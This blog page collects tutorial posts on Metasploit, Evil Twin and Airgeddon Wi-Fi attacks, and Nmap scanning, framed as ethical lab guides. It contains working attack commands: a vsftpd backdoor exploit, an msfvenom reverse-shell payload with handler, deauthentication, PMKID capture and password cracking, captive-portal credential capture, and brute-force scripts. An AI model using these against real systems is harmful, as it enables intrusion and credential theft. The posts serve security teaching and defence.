Saturday, September 20, 2025

Metasploit for Beginners — Practical Lab Guide & Ethical Use

 

🛠️ Metasploit for Beginners — A Practical, Human Guide

Important: Metasploit is a powerful penetration-testing framework. Use it only in an isolated lab or on systems where you have written permission. Unauthorized scanning or exploitation is illegal and unethical.

Why I started learning Metasploit

When I first opened Metasploit, it felt intimidating — a huge toolbox of modules, exploits, payloads, and cryptic options. But the more I used it in my lab, the more it made sense: Metasploit is a guided classroom that teaches you how attackers think and how defenders should react. The goal of this post is to demystify Metasploit and give you a clear, ethical path to learning it step by step.

What is Metasploit (in plain words)?

Metasploit is a modular framework used by penetration testers and security researchers to validate vulnerabilities. Think of it as a workshop where:

  • Exploit modules attempt to take advantage of a specific bug.

  • Payloads are the code you deliver (a reverse shell, a Meterpreter session, etc.).

  • Auxiliary modules help with scanning, fuzzing, and reconnaissance.

  • Post-exploitation tools let you enumerate and collect evidence after you get a foothold.

Used responsibly, it teaches defenders what attackers could do — and that knowledge helps harden systems.

Lab setup — how I practice safely

Before you run a single exploit, create a safe environment:

  1. Isolated network: Use VirtualBox/VMware with host-only or an internal network so nothing touches the public internet.

  2. Attacker machine: Kali Linux (VM or bare-metal).

  3. Target machine(s): Purposefully vulnerable VMs like Metasploitable 2/3 or deliberately misconfigured containers.

  4. Snapshots: Take VM snapshots so you can easily revert after experiments.

This keeps your experiments ethical, safe, and reproducible.

Quick install (Kali / Debian)

If Metasploit is not already installed on Kali:

sudo apt update
sudo apt install metasploit-framework
sudo systemctl start postgresql
sudo msfdb init

Then start the console:

msfconsole

Expect a slow first load — Metasploit is indexing modules and connecting to its database.

The simple Metasploit workflow (high level)

  1. Reconnaissance — find services and versions (use nmap).

  2. Searchsearch for a module that targets the discovered service.

  3. Configureuse <module>, show options, set RHOST <ip>, set LHOST <your ip>.

  4. Exploitexploit or run.

  5. Post-exploitsessions -i <id> then run safe commands like sysinfo, getuid, ps.

  6. Document & restore — save logs, screenshots, revert VM snapshot.

Hands-on example (safe target)

Assume you have a Metasploitable VM at 192.168.56.101.

  1. Scan the target:

nmap -sV -p- 192.168.56.101

  1. In msfconsole, search for a relevant module:

search vsftpd

  1. Use a found module:

use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOST 192.168.56.101
set RPORT 21
exploit

If the exploit succeeds, sessions -l will show your session. Interact with it:

sessions -i 1
sysinfo
getuid

Remember: with lab targets you can explore more invasive post-exploit techniques. In production, you should never perform destructive actions without permission.

Payloads & msfvenom — building a custom payload

Metasploit’s msfvenom can create payloads that you deliver to targets in lab scenarios:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f elf -o shell.elf

Then in msfconsole:

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.56.1
set LPORT 4444
run

When shell.elf runs on the target (lab only), the handler receives the session.

Post-exploitation (ethically informative)

Once you have a session, focus on non-destructive actions that teach you about the system:

  • sysinfo — system details

  • ps — running processes

  • ifconfig / ip a — network interfaces

  • download — retrieve a single benign file for analysis

  • hashdumponly in lab or with client permission, used for demonstrating weak password storage

Always document what you do and why — clear reporting is a core part of professional testing.

How defenders can use Metasploit knowledge

Learning Metasploit helps defenders to:

  • Prioritize patching for services actively exploited in the wild.

  • Harden configurations and close unnecessary ports.

  • Monitor for reverse shell behavior and anomalous outbound connections.

  • Test detection rules in SIEM/EDR with safe, controlled scenarios.

Common mistakes & safety tips

  • Don’t target the public internet. Even scanning can get you blocked or legal trouble.

  • Mind destructive modules. Some exploits crash services — avoid them unless allowed.

  • Use snapshots. Always have a rollback plan.

  • Log everything. Your test report should include commands, timestamps, and screenshots.

Where to go next

  • Practice on Metasploitable, TryHackMe and HTB (legal, consented targets).

  • Read Metasploit: The Penetration Tester’s Guide.

  • Learn to write small Meterpreter scripts and to parse msfconsole output for reporting.

Final thoughts

Metasploit is a gateway: once you understand its logic, you’ll better anticipate attacker moves and build more resilient defenses. The real value isn’t in “hacking” — it’s in learning, documenting, and improving security. Use it responsibly, and it will make you a better defender.

on No comments:
Labels: , , , , ,

Tuesday, September 16, 2025

Evil Twin Wi-Fi Attack: A Step-By-Step Guide (Ethical Lab Walkthrough)

 Listen first, then act. This post is an educational, ethical-hacking guide meant for controlled labs and authorized security testing only. Never run attacks against networks you do not own or have explicit written permission to test.

What is an Evil Twin Attack?

An Evil Twin is a rogue Wi-Fi access point that impersonates a legitimate wireless network (same SSID and similar settings) to trick users into connecting. Once connected, victims may be shown a captive portal or have their traffic intercepted — enabling credential capture, session hijacking, or other man-in-the-middle tactics.

Ethical hackers use Evil Twin simulations to help organizations harden networks and train users. Black-hat attackers use the same technique to steal credentials and sensitive data. That’s why defenders must understand the method end-to-end.

Before you begin — legal & ethical notice

Perform this guide only in a properly isolated lab environment or on systems you own and control, or when you have written permission from the network owner. Unauthorized testing can violate local laws (Computer Misuse Acts, CFAA, IT Acts, etc.) and may carry severe penalties.

Lab hardware & software checklist

To practice safely, prepare the following:

  • A dedicated lab router (preferably disconnected from the internet).

  • A test client (phone or laptop) to connect to the lab router.

  • A Kali Linux VM or physical installation.

  • One (or two) external USB Wi-Fi adapters that support monitor mode and packet injection. Prefer chipsets like MediaTek/MT76xx for virtual interface support if you want to run AP + monitor from a single adapter.

  • Tools: Airgeddon, aircrack-ng, hcxdumptool, hashcat (Airgeddon automates many steps).

Lab setup (quick)

  1. Factory-reset / isolate an old router and set it to WPA2-Personal.

  2. Create an SSID (example: Silence_of_the_LANs) and a simple password (example: w0rkplac3rul3s) for testing.

  3. Connect a mobile device to that SSID — this will be your test victim.

  4. Boot Kali Linux and connect the USB Wi-Fi adapter to the Kali VM (use VirtualBox USB passthrough if needed).

  5. Install Airgeddon (if not present):

git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
cd airgeddon
./airgeddon.sh

Step-by-step Evil Twin with Airgeddon (high level)

Note: Airgeddon automates menus and windows; below is the typical flow and important commands.

1. Choose interface & enable monitor mode

  • Start Airgeddon and select your external Wi-Fi adapter from the menu.

  • Allow Airgeddon to put the interface into monitor mode (it may create wlan0mon).

Alternatively, manual:

sudo airmon-ng start wlan0
# monitor interface becomes wlan0mon (example)

2. Scan and pick the target network

  • From Airgeddon choose the Evil Twin AP attack menu.

  • Let it scan for nearby SSIDs. Identify your lab SSID (Silence_of_the_LANs) and note the BSSID (AP MAC) and channel.

3. Configure & launch the Evil Twin AP

  • Airgeddon will offer to clone SSID and spoof MAC (you can choose to spoof).

  • The tool will create a fake AP that mirrors the target’s SSID and bring up DHCP/DNS and a webserver for a captive portal.

4. Deauthentication to force reconnection

  • To lure clients to the fake AP, Airgeddon runs a deauthentication attack:

sudo aireplay-ng --deauth 10 -a <AP_MAC> wlan0mon
# or continuous: --deauth 0

The deauth disconnects clients from the legitimate AP; they may then auto-connect to the stronger/fake AP or do so manually.

5. Captive portal & credential capture

  • Airgeddon presents a captive portal when the victim connects to the Evil Twin. If the victim submits credentials (e.g., Wi-Fi key or web login), the tool records them to a local file and displays them on the control window.

6. Save evidence & cleanup

  • Save captured credentials and handshake files if required for reporting.

  • Stop the fake AP and restore the Wi-Fi adapter to managed mode:

sudo airmon-ng stop wlan0mon
sudo service NetworkManager restart

Advanced tactics (what attackers/additional tools may use)

  • AP mimicry & VIF: Spoof vendor details (MAC OUI) and use virtual interfaces to present a near-identical AP.

  • Pharming & portal imitation: Mirror corporate login pages (e.g., Office 365) for credential harvesting. (Ethically, do not replicate exact brand pages in public demos.)

  • Traffic interception: Combine with bettercap or mitmproxy to intercept, analyze, and manipulate HTTP traffic.

  • Integration with SET/BeEF: Social engineering + browser exploitation to expand the attack surface.

Defenses: how to protect users & networks

  • Use WPA3 where possible and disable legacy protocols (WEP, TKIP).

  • Enable 802.11w (Protected Management Frames) to reduce deauth spoofing impact.

  • Disable auto-connect to open networks and educate users to verify SSIDs.

  • Use HTTPS & HSTS: Even if a captive portal appears, encrypted web traffic mitigates credential theft.

  • User training: Teach staff to recognize suspicious captive portals and double-check network names.

  • Network monitoring: Detect high rates of deauth frames or rogue APs with an IDS/WIDS (wireless IDS).

Example commands & tools (cheat sheet)

  • Put adapter in monitor mode:

sudo airmon-ng start wlan0

  • Scan networks:

sudo airodump-ng wlan0mon

  • Deauth a client/AP:

sudo aireplay-ng --deauth 10 -a <AP_MAC> wlan0mon

  • Capture PMKID (alternative faster method):

hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
hcxpcaptool -z pmkid.16800 pmkid.pcapng
hashcat -m 16800 pmkid.16800 wordlist.txt

  • Crack handshake with aircrack-ng:

aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.cap

Responsible disclosure & reporting

If you find vulnerabilities while testing for a client, follow responsible disclosure: document evidence, impact, and remediation steps; deliver findings to the authorized stakeholders; allow time for remediation before public disclosure.

Final thoughts

The Evil Twin is a deceptively simple but highly effective tactic that combines technical spoofing with social engineering. Out in the wild it’s a serious threat; in the lab it’s a powerful teacher. Use this knowledge ethically — strengthen defenses, train users, and help build safer wireless environments.

on 1 comment:
Labels: , , , ,

Saturday, September 13, 2025

Wi-Fi Penetration Testing with Airgeddon – Step-by-Step Ethical Hacking Guide

 


📡 Wi-Fi Penetration Testing with Airgeddon – Step-by-Step Guide

Wi-Fi security is one of the most critical areas in cybersecurity. Attackers are constantly looking for weak wireless networks, and defenders must learn how these attacks work to secure them.

In this guide, I’ll share my journey of exploring Airgeddon, a powerful Wi-Fi penetration testing framework, and walk you through step-by-step commands and methods that hackers use—and defenders must know.

🔧 Step 1: Installing Airgeddon

First, I cloned Airgeddon from GitHub and started the script:

git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
cd airgeddon
./airgeddon.sh

The script checks for dependencies and sets up the environment. Once ready, Airgeddon launches a menu-driven interface that makes attacks easier to perform.

📡 Step 2: Setting Wi-Fi Card to Monitor Mode

To capture traffic, the Wi-Fi adapter must be switched to monitor mode. Without this, scanning and capturing packets isn’t possible.

Airgeddon helps automate this, but you can also use:

airmon-ng start wlan0

Now, the adapter listens to all wireless traffic.

🤝 Step 3: Capturing WPA/WPA2 Handshakes

The next step was to capture the handshake when a device connects to the Wi-Fi.

  • Scan for available Wi-Fi networks.

  • Select the target.

  • Run a deauthentication attack to force devices to reconnect.

aireplay-ng --deauth 10 -a <AP_MAC> wlan0mon


-a <AP_MAC>
Specifies the BSSID / MAC address of the target Access Point (the AP you want to target),
e.g. -a 00:11:22:33:44:55. This targets frames directed from the AP (or attacks clients 
associatedto that AP depending on options).

As soon as a client reconnected, Airgeddon captured the handshake—like catching a secret mid-air.

🔑 Step 4: Cracking the Password

A handshake file alone doesn’t reveal the Wi-Fi password. We must crack it.

Airgeddon provides several methods:

  • Dictionary attack: Use a wordlist like rockyou.txt.

  • Brute force: Try every possible combination (time-consuming).

  • Hashcat rules: Smarter guesses for common password patterns.

aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.cap

👉 Sometimes the password is found quickly, other times it shows how strong even a simple-looking password can be.

🎭 Step 5: Evil Twin Attack

One of the most eye-opening features was the Evil Twin attack.

  • Airgeddon creates a fake Wi-Fi network identical to the real one.

  • Victims connect, thinking it’s legitimate.

  • A captive portal appears, asking for the Wi-Fi password.

  • If entered, it’s captured instantly.

This showed how social engineering + technical tricks can easily fool users.

⚡ Step 6: PMKID Attack

Instead of waiting for a handshake, Airgeddon also supports the PMKID attack, which directly captures the Pairwise Master Key Identifier from the router.

hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
hcxpcaptool -z pmkid.16800 pmkid.pcapng
hashcat -m 16800 pmkid.16800 wordlist.txt

This method is faster and works even if no client is connected to the Wi-Fi.

💡 Lessons for Defenders

By exploring these attacks, I learned how important it is to:

  • Use long, complex Wi-Fi passwords.

  • Disable WPS (a common weak point).

  • Keep router firmware up to date.

  • Educate users to avoid fake Evil Twin networks.

✅ Final Thoughts

Airgeddon turned my Wi-Fi hacking session into both a technical lesson and a human story. Every captured handshake, every failed crack, every successful trick taught me one thing:

👉 Hacking is not about breaking—it’s about understanding, so we can defend better.

on No comments:
Labels: , , , ,

Wednesday, September 10, 2025

Nmap Basics Part 5 – Using Nmap for Network Defense

 


🔐 Nmap Basics Part 5 – Using Nmap for Network Defense

When people hear “Nmap,” they often think about hackers scanning networks. But here’s the truth:
👉 Nmap is equally valuable for defenders, system administrators, and security teams.

If you’re responsible for a company network (or even your home lab), you need to think like an attacker. Nmap helps you see your systems the way hackers do, so you can fix weaknesses before they exploit them.

In this post, I’ll walk you through practical defensive use cases of Nmap with detailed commands and outputs.

🟢 1. Discovering Unauthorized Devices

One of the first steps in network defense is knowing what’s connected. Attackers love to sneak in rogue devices or IoT gadgets that no one monitors.

Command:

nmap -sn 192.168.1.0/24

  • -sn → Ping sweep (host discovery only).

  • Scans the entire subnet (change /24 to your network size).

Sample Output:

Nmap scan report for 192.168.1.10
Host is up (0.0030s latency).
MAC Address: 00:1C:42:2B:60:5A (Apple, Inc.)

Nmap scan report for 192.168.1.15
Host is up (0.0020s latency).
MAC Address: 00:23:45:6B:78:90 (Dell)

👉 As a defender:

  • Keep a list of approved devices.

  • If a new IP/MAC pops up → investigate immediately.

🔵 2. Auditing Open Ports (Attack Surface Mapping)

Attackers scan for open ports; defenders should do the same.

Command:

nmap -sS -sV -T4 192.168.1.10

  • -sS → SYN stealth scan.

  • -sV → Detect service versions.

  • -T4 → Faster but still reliable speed.

Sample Output:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2
80/tcp open  http    Apache httpd 2.4.18
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

👉 Defensive Action:

  • Ask: Do I really need this port open?

  • Close unnecessary ports via firewall.

  • Patch outdated services (like Apache or SMB).

🟡 3. Checking Firewall Effectiveness

Many admins think their firewall is blocking ports, but misconfigurations are common.

Command:

nmap -p 1-1000 --reason <public-ip>

  • -p 1-1000 → Scan first 1000 ports.

  • --reason → Show why Nmap marks a port open/filtered.

Output Explanation:

80/tcp open     http
22/tcp filtered
443/tcp closed

  • Open → Firewall not blocking.

  • Closed → No service running, but firewall allows connection.

  • Filtered → Firewall blocked it (this is what you want).

👉 Defensive Action:

  • Review firewall rules if you see unexpected open/closed ports.

🔴 4. Detecting Vulnerable Services

Even one outdated service can be an attacker’s entry point.

Command:

nmap -sV --script vuln 192.168.1.10

  • Runs vulnerability scripts against detected services.

Sample Output:

445/tcp open  microsoft-ds
| smb-vuln-ms17-010:
|   VULNERABLE: Remote Code Execution vulnerability (EternalBlue)
|   References:
|     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144

👉 Defensive Action:

  • Immediately patch or disable the service.

  • If patching isn’t possible, restrict access via firewall.

🟣 5. Auditing SSL/TLS Security

Weak SSL/TLS makes your services vulnerable to downgrade attacks.

Command:

nmap --script ssl-enum-ciphers -p443 example.com

Output Example:

TLSv1.0 ciphers:
  TLS_RSA_WITH_3DES_EDE_CBC_SHA (weak)
  TLS_RSA_WITH_AES_128_CBC_SHA (strong)

👉 Defensive Action:

  • Disable weak ciphers (like 3DES, RC4).

  • Enforce modern TLS versions (1.2/1.3).

🟤 6. Continuous Monitoring with Automated Scans

Defenders can’t just scan once—they must monitor regularly.

Linux (cron job):

0 2 * * * nmap -sV -oN /var/log/nmap-daily.txt 192.168.1.0/24

Windows (Task Scheduler):

  • Run nmap.exe with -oX (XML output for SIEM integration).

👉 Defensive Action:

  • Compare daily logs → detect new devices or new services.

  • Feed XML/JSON output into a SIEM (like Splunk, Wazuh, or ELK).

🟠 7. Detecting Malware & Backdoors

Sometimes malware opens hidden backdoors. Nmap scripts can help detect them.

Command:

nmap --script smb-double-pulsar-backdoor -p445 192.168.1.10

👉 Defensive Action:

  • If detected → isolate machine immediately.

  • Run forensic analysis + antivirus scans.

✅ Final Thoughts

Nmap is not just a hacker’s toy—it’s also a defender’s early warning radar.

As a network admin or security analyst, you can use it to:

  • Track all devices on your network.

  • Map your attack surface.

  • Verify firewall rules.

  • Detect vulnerable services.

  • Audit SSL/TLS security.

  • Automate scans for continuous monitoring.

  • Spot malware/backdoors early.

💡 Key Lesson: Defenders who use Nmap regularly stay one step ahead of attackers.

In Part 6, I’ll show real penetration testing scenarios, where we combine multiple Nmap techniques for both offense and defense. 🚀

on No comments:
Labels: , , , , , , , , , , , ,
Location: Delhi, India

Tuesday, September 9, 2025

Nmap Basics Part 4 – Scripting Engine & Vulnerability Scanning

 



⚡ Nmap Basics Part 4 – Scripting Engine (NSE) & Vulnerability Scanning

In the last three parts of this series, we explored basic scans, scanning techniques, and advanced options. Now, it’s time to level up with one of Nmap’s most powerful features: the Nmap Scripting Engine (NSE).

With NSE, Nmap can go beyond port scanning and perform vulnerability detection, brute-force attacks, malware discovery, and much more. This makes it a favorite among both penetration testers and defenders.

🔹 What is NSE?

The Nmap Scripting Engine allows users to run scripts written in Lua that automate a wide range of tasks:

  • Vulnerability detection (CVE checks)

  • Service enumeration (detailed info about services)

  • Brute-force logins

  • Malware/backdoor detection

  • Advanced network discovery

📌 Scripts are stored inside the Nmap installation directory under /scripts/.
You can also create custom Lua scripts if needed.

🔵 1. Running Default Scripts (-sC)

The simplest way to use NSE is with the default set of scripts.

Command:

nmap -sC 192.168.1.10

This will run a safe set of scripts (like checking SSL certificates, HTTP titles, etc.).

Sample Output:

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41
| http-title: Apache2 Ubuntu Default Page: It works
| http-server-header: Apache/2.4.41 (Ubuntu)
443/tcp open  https   OpenSSL 1.1.1f
| ssl-cert: Subject: commonName=example.com
| Not valid before: 2023-05-10T00:00:00
| Not valid after : 2024-05-09T23:59:59

👉 Great for quick recon during penetration testing.

🟢 2. Running Specific Scripts (--script)

If you know the script name, you can run it directly.

Example: Checking for SMB vulnerabilities

nmap --script smb-vuln* -p445 192.168.1.10

This runs all scripts starting with smb-vuln, including:

  • smb-vuln-ms08-067

  • smb-vuln-ms17-010 (EternalBlue, WannaCry exploit)

Sample Output:

PORT    STATE SERVICE
445/tcp open  microsoft-ds
| smb-vuln-ms17-010:  
|   VULNERABLE: Remote Code Execution vulnerability in SMBv1
|   References:
|     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144

👉 This tells you if a host is vulnerable—extremely useful in red team/blue team exercises.

🟡 3. Vulnerability Scanning with vulners

The vulners script checks service versions against a CVE database.

Command:

nmap --script vulners -sV 192.168.1.10

Sample Output:

22/tcp open  ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2
| vulners:  
|   CVE-2016-0777  7.5  https://vulners.com/CVE-2016-0777
|   CVE-2016-10009 6.8  https://vulners.com/CVE-2016-10009

👉 This is almost like running a mini vulnerability scanner directly inside Nmap.

🔴 4. Script Categories

Nmap scripts are divided into categories:

  • auth → Authentication (e.g., brute-forcing credentials)

  • vuln → Vulnerability checks

  • safe → Non-intrusive info gathering

  • intrusive → May crash or disrupt services

  • discovery → Network and service discovery

Example: Running all discovery scripts

nmap --script discovery 192.168.1.10

🟣 5. Combining NSE with Other Options

You can combine NSE with version detection, OS detection, and aggressive scans for maximum detail.

Example:

sudo nmap -A --script vuln 192.168.1.10

This runs an aggressive scan + all vulnerability scripts → very noisy but very detailed.

🟤 6. Writing Custom Scripts

For advanced users, you can write custom NSE scripts in Lua.
Example uses:

  • Automating checks for your company’s web apps.

  • Testing custom protocols.

  • Monitoring services with specific rules.

    📜 Useful Advanced NSE Scripts

    If you want to go beyond the basics, here’s a list of powerful Nmap Scripting Engine (NSE) scripts you can try for advanced scans:

    🔐 Authentication & Brute Force

    • ftp-brute → Brute-force FTP login credentials.

    • ssh-brute → Brute-force SSH logins.

    • http-brute → Brute-force HTTP basic/digest authentication.

    • mysql-brute → Brute-force MySQL database credentials.

    Example:

    nmap --script ftp-brute -p21 192.168.1.10

    🛡 Vulnerability Detection

    • smb-vuln-ms08-067 → Detects MS08-067 (Conficker worm exploit).

    • smb-vuln-ms17-010 → Detects EternalBlue (WannaCry exploit).

    • http-vuln-cve2006-3392 → Apache mod_jk vulnerability check.

    • ssl-ccs-injection → Detects SSL/TLS CCS Injection (CVE-2014-0224).

    • ftp-vsftpd-backdoor → Checks for VSFTPD backdoor (CVE-2011-2523).

    Example:

    nmap --script smb-vuln-ms17-010 -p445 192.168.1.10

    🌐 Web Application Enumeration

    • http-title → Shows the title of a webpage.

    • http-headers → Fetches HTTP response headers.

    • http-enum → Enumerates common web app directories.

    • http-methods → Detects allowed HTTP methods (GET, POST, PUT, etc.).

    • http-sql-injection → Attempts SQL injection checks.

    • http-shellshock → Detects Shellshock vulnerability (CVE-2014-6271).

    Example:

    nmap --script http-enum -p80,443 192.168.1.10

    🔒 SSL/TLS Security

    • ssl-cert → Fetches SSL certificate details.

    • ssl-enum-ciphers → Lists supported SSL/TLS ciphers.

    • ssl-heartbleed → Detects Heartbleed vulnerability (CVE-2014-0160).

    • tls-nextprotoneg → Tests Next Protocol Negotiation.

    Example:

    nmap --script ssl-enum-ciphers -p443 192.168.1.10

    🗂 Database & Service Checks

    • mysql-info → Fetches MySQL version and info.

    • mongodb-info → Enumerates MongoDB databases.

    • redis-info → Gets Redis server info.

    • ms-sql-info → Enumerates Microsoft SQL Server details.

    • rdp-enum-encryption → Checks RDP encryption strength.

    Example:

    nmap --script mysql-info -p3306 192.168.1.10

    🚀 Malware & Backdoor Detection

    • irc-unrealircd-backdoor → Detects backdoored UnrealIRCd (CVE-2010-2075).

    • http-malware-host → Checks if a host is serving malware.

    • smb-double-pulsar-backdoor → Detects DoublePulsar SMB backdoor.

    Example:

    nmap --script smb-double-pulsar-backdoor -p445 192.168.1.10

    ⚡ Pro Tip

    You can run multiple scripts together with categories:

    • --script vuln → All vulnerability detection scripts.

    • --script auth → All authentication/brute force scripts.

    • --script safe → Non-intrusive safe scripts.

    • --script intrusive → Aggressive scans (may crash services).

    Example:

    nmap --script vuln 192.168.1.10

    ✅ By combining these NSE scripts, Nmap becomes a lightweight penetration testing toolkit that can:

    • Identify vulnerabilities.

    • Brute-force weak logins.

    • Enumerate web apps and databases.

    • Detect malware/backdoors.

    ⚠️ Reminder: Use responsibly on your own lab networks or with explicit permission only.

✅ Final Thoughts

The Nmap Scripting Engine turns Nmap into a powerful vulnerability scanner and automation tool.

  • -sC = Default safe scripts.

  • --script <name> = Run specific scripts.

  • --script vuln = Vulnerability checks.

  • --script vulners = CVE database checks.

💡 Pro Tip: Always run NSE scans on your own lab or authorized networks only. These scans can be very aggressive and may trigger alarms or even crash weak services.

In Part 5, we’ll explore Nmap for Network Defense—how system admins and defenders can use Nmap for hardening and monitoring their networks 🔐.

on No comments:
Labels: , , , , , , , , , ,
Location: Delhi, India

Sunday, September 7, 2025

Nmap Basics Part 3 – Advanced Options Every Beginner Should Know

 


⚡ Nmap Basics Part 3 – Advanced Options for Smarter Scanning

In the first two parts of this series, I explored basic scans like TCP, SYN, and UDP. But Nmap isn’t just about finding open ports—it can also tell you what’s running on those ports, what operating system the target uses, and even trace the network path.

In this part, we’ll go deeper into advanced Nmap options that make it a powerful tool for ethical hackers and network defenders.

🟢 1. Aggressive Scan (-A)

The Aggressive Scan is like a Swiss Army knife—it bundles several powerful features together:

  • OS detection (-O)

  • Version detection (-sV)

  • Default scripts (-sC)

  • Traceroute (network path mapping)

Command:

sudo nmap -A 192.168.1.10

🔹 Explanation:

  • sudo → Needed for OS and traceroute functions.

  • -A → Tells Nmap to combine advanced features.

  • 192.168.1.10 → Target system.

Sample Output:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6 (Ubuntu)
80/tcp open  http    Apache httpd 2.4.29
MAC Address: 00:0c:29:4a:8d:21 (VMware)
Device type: general purpose
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop

👉 Use cases:

  • Quickly gathering maximum information about a host.

  • Useful in penetration testing labs.

👉 Risks:

  • Very noisy (easy for firewalls/IDS to detect).

  • Should not be used on networks without permission.

🔵 2. OS Detection (-O)

OS detection is one of Nmap’s coolest features. It works by sending different TCP/IP packets and analyzing how the target responds—like a fingerprint.

Command:

sudo nmap -O 192.168.1.10

Sample Output:

Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4
OS details: Linux 4.2 - 4.9

👉 Use cases:

  • Helps attackers know if the system is Windows, Linux, macOS, or IoT device.

  • Helps defenders verify their systems are configured properly.

👉 Limitations:

  • Works best if multiple ports are open.

  • Accuracy decreases if the target is behind firewalls or uses OS obfuscation.

🟡 3. Version Detection (-sV)

Instead of just saying “Port 80 is open”, version detection tells you what service and version is running.

Command:

nmap -sV 192.168.1.10

Sample Output:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp open  http    Apache httpd 2.4.41
443/tcp open  https   nginx 1.18.0

👉 Use cases:

  • Identifying outdated software (e.g., Apache 2.2 is old and vulnerable).

  • Creating a list of services to check for vulnerabilities.

👉 Pro Tip: Combine with Vulners NSE script to automatically check for CVEs:

nmap --script vulners -sV 192.168.1.10

🔴 4. Fast Scan (-F)

By default, Nmap scans the 1,000 most common ports. With -F, it checks only the top 100 ports, making it faster.

Command:

nmap -F 192.168.1.10

👉 Use cases:

  • Quick checks during troubleshooting.

  • Fast discovery of the most likely services.

👉 Limitation:

  • You may miss uncommon ports (like 8080 or 3306).

🟣 5. Timing Options (-T0 to -T5)

Nmap lets you adjust speed vs. stealth:

  • -T0 → Paranoid (very slow, avoids detection).

  • -T1 → Sneaky.

  • -T2 → Polite (slower, less bandwidth).

  • -T3 → Normal (default).

  • -T4 → Aggressive (fast, more likely to be detected).

  • -T5 → Insane (very fast, guaranteed to trigger alarms).

Command:

nmap -sS -T4 192.168.1.10

👉 Use cases:

  • T0–T2 → When you want stealth in red team/pen-testing scenarios.

  • T3 → General scanning.

  • T4–T5 → Lab practice or when detection isn’t a concern.

🟤 Bonus: Combining Options

You can mix these advanced options for powerful scans.

Example: Aggressive + Fast + Timing

sudo nmap -A -F -T4 192.168.1.10

👉 This runs an all-in-one aggressive scan, but only on the top 100 ports, at high speed.

✅ Final Thoughts

With these advanced options, Nmap becomes much more than a simple port scanner:

  • -A = All-in-one full detail.

  • -O = OS fingerprinting.

  • -sV = Service & version discovery.

  • -F = Faster top-port scans.

  • -T0–T5 = Control between stealth and speed.

💡 Pro Tip for Beginners: Practice combining different options in your home lab or virtual machines. You’ll quickly see how attackers think and how defenders can spot them.

In Part 4, we’ll dive into the Nmap Scripting Engine (NSE) to scan for vulnerabilities and automate advanced checks 🚀

on No comments:
Labels: , , , , , , , ,
Location: Delhi, India
Subscribe to: Comments (Atom)